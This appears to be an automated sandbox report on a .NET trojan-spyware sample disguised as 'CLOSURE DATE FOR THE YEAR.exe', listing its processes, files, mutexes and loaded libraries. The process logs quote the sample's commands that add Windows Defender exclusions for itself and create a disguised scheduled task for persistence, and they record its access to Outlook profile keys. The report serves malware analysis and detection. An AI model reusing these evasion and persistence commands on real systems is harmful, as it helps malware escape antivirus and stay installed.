Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.cs	Security API names: _0020.SetAccessControl
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3e98e40.2.raw.unpack, jviyFnUkOEMiWAYfmN.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/20@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

8_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

8_2_0040434D

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

File created: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Mutant created: \Sessions\1\BaseNamedObjects\vfbDDGhjAxhVXHPRpkmedSIljgH
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8056
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

File created: C:\Users\user\AppData\Local\Temp\tmpB774.tmp

Jump to behavior

Source: CLOSURE DATE FOR THE YEAR.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: CLOSURE DATE FOR THE YEAR.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CLOSURE DATE FOR THE YEAR.exe	ReversingLabs: Detection: 39%
Source: CLOSURE DATE FOR THE YEAR.exe	Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

File read: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8056 -s 1768
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp"	Jump to behavior

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: CLOSURE DATE FOR THE YEAR.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CLOSURE DATE FOR THE YEAR.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb%t& source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Accessibility.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP*n0C:\Windows\mscorlib.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056433642.0000000000737000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2902905606.0000000000E52000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2902905606.0000000000E52000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: System.Configuration.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2071822509.0000000007CF8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbAccessibility.dll source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.Xml.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056533071.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdb source: WERA61F.tmp.dmp.16.dr
Source:	Binary string: %%.pdb source: IOsbBBIDAm.exe, 00000009.00000002.2056433642.0000000000737000.00000004.00000010.00020000.00000000.sdmp
